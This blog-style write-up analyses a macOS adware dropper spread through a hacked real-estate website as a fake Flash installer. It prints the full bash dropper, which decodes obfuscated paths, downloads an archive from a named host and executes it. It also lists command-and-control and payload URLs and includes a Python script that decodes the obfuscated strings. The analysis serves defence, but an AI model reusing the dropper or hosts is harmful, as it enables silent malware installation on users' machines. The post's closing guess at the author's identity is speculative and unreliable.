In this article, I will walk you through the analysis of malware distributed by the hacked kwmarina.com website.

I was searching for a new place to live in LA on Zillow and found an interesting location. The contact for it was Jesse Weinberg from Keller Williams Silicon Beach.
[Screenshot]

I googled this guy and the first result was marina.yourkwoffice.com. In fact, this is the website they list on their Facebook.
[Screenshot]

If you click on Search For Properties in Your Area in Chrome, you are redirected to a Flash download page that automatically downloads Adobe Flash Player.dmg.

[Screenshot: malwaredownload]

I used https://www.freefileconvert.com/ to convert the .dmg into a .zip, so that nothing would auto-run when I opened it.

After unzipping the file, I saw the usual contents of a dmg archive; however, the install script was just a bash script:
[Screenshot]

With the following content:

#!/bin/bash

# Staging server and path; the file name is hidden behind two layers of base64
dlDomain="wmbev.almondtoronto.win"
dlPath="sdl"
dir="${TMPDIR}/mmstmp"
# Decodes to mmStub.tar.gz; ?ts=<epoch> is a cache-buster
dlUrl="http://${dlDomain}/${dlPath}/$(echo "YlcxVGRIVmlMblJoY2k1bmVnbz0K" | openssl base64 -d -A | openssl base64 -d -A)?ts=$(date +%s)"
# Decodes to mm-install-macos.app/Contents/MacOS/mm-install-macos
binPath="${dir}/$(echo "YlcwdGFXNXpkR0ZzYkMxdFlXTnZjeTVoY0hBdlEyOXVkR1Z1ZEhNdlRXRmpUMU12YlcwdGFXNXpkR0ZzYkMxdFlXTnZjd289Cg==" | openssl base64 -d -A | openssl base64 -d -A)"
# Wipe and recreate the staging directory, fetch the archive silently (following redirects)
rm -rf "${dir}"
mkdir -p "${dir}"
curl -s -L -o "${dir}/stmp.tar.gz" "${dlUrl}"
# Unpack, mark the embedded app binary executable and run it
tar -xvzf "${dir}/stmp.tar.gz" -C "${dir}"
chmod +x "${binPath}"
"${binPath}"

Essentially what this does is:

  1. Download http://wmbev.almondtoronto.win/sdl/mmStub.tar.gz
  2. Extract it
  3. Execute mm-install-macos.app/Contents/MacOS/mm-install-macos

These are the contents of mmStub.tar.gz:
[Screenshot]

After loading the binary in IDA Pro, I saw that it was written in Objective-C, which is both a tip and a pain in the ass. The tip lies in the fact that some of the class names can be deobfuscated easily. The pain in the ass is tracking the X-Refs through the Objective-C messaging system: following the execution flow is tricky.

[Screenshots]

I see there are some obfuscated strings. It appears that the author didn't try to obfuscate the program's code, but instead obfuscated the C2C (command-and-control) URLs. As I mentioned above, we can see class names, and luckily there is a class specifically for encrypting and decrypting strings. Below is a screenshot of the function that decrypts a single byte, and wait for it.... it's a Vigenère cipher. Lol.
[Screenshot: decrypt]
Finding the key doesn't take long either. Stare at the assembly for a little while and it will come to you.
[Screenshot: class_init_key]
The class is being initialized with the key 1522855729. I threw together a simple Python script and went on decrypting. You can see it here.

[Screenshot: decrypt-urls]
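For reference, here is my own reconstruction of the two decoding steps this write-up relies on (it is an added example, not the script the author links to or anything from the malware itself): stripping the double base64 from the dropper script above, and a byte-wise Vigenère decrypt with the recovered key. The base64 blobs are the real ones from the dropper; the Vigenère sample is constructed by encrypting the stage-2 URL from this post, and the mapping of the key 1522855729 to key bytes (its decimal digits as ASCII) is an assumption.

```python
import base64
from itertools import cycle

# Double-base64 strings copied from the dropper script (real values from the write-up).
DROPPER_STRINGS = {
    "dlPath": "YlcxVGRIVmlMblJoY2k1bmVnbz0K",
    "binPath": "YlcwdGFXNXpkR0ZzYkMxdFlXTnZjeTVoY0hBdlEyOXVkR1Z1ZEhNdlRXRmpUMU12YlcwdGFXNXpkR0ZzYkMxdFlXTnZjd289Cg==",
}


def decode_dropper_string(blob: str) -> str:
    """Undo the two nested base64 layers (the script pipes through `openssl base64 -d` twice).
    bash's $(...) strips trailing newlines from the result, so we do the same."""
    inner = base64.b64decode(blob)
    return base64.b64decode(inner).decode("ascii").rstrip("\n")


# Key recovered from the class initializer. How the binary turns that number into key
# bytes is an assumption here: we use its decimal digits as ASCII.
KEY = b"1522855729"


def vigenere_decrypt(cipher: bytes, key: bytes = KEY) -> bytes:
    """Byte-wise Vigenere: subtract the matching (cycled) key byte from each byte, mod 256."""
    return bytes((c - k) % 256 for c, k in zip(cipher, cycle(key)))


def vigenere_encrypt(plain: bytes, key: bytes = KEY) -> bytes:
    """Inverse of vigenere_decrypt; only used to build the constructed sample below."""
    return bytes((p + k) % 256 for p, k in zip(plain, cycle(key)))


# Constructed sample: the stage-2 payload URL from the write-up, obfuscated with the
# same scheme. It is NOT a string pulled from the binary.
SAMPLE_CIPHER = vigenere_encrypt(
    b"http://software.macsoftwareserver05.com/mac/mediaDownloader.tar.gz")


def decode_sample() -> str:
    """Decrypt the constructed sample back to the plain URL."""
    return vigenere_decrypt(SAMPLE_CIPHER).decode("ascii")


if __name__ == "__main__":
    for name, blob in DROPPER_STRINGS.items():
        print(f"{name} -> {decode_dropper_string(blob)}")
    print(f"stage-2 URL -> {decode_sample()}")
```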

The malware's C2C lives on subdomains of macinstallerinfo.com. For example, the actual useful payload can be found at http://software.macsoftwareserver05.com/mac/mediaDownloader.tar.gz,
which does nothing but its adware stuff:
[Screenshot: grabber]
Nothing interesting.

Looking at the strings in the 2nd stage one more time shows us this:
[Screenshot: oopsie]

The only guy with this username on the internet is this one:
[Screenshot: avivais2]

Maybe just a bad coincidence, but my bet is bad opsec, just like his malware.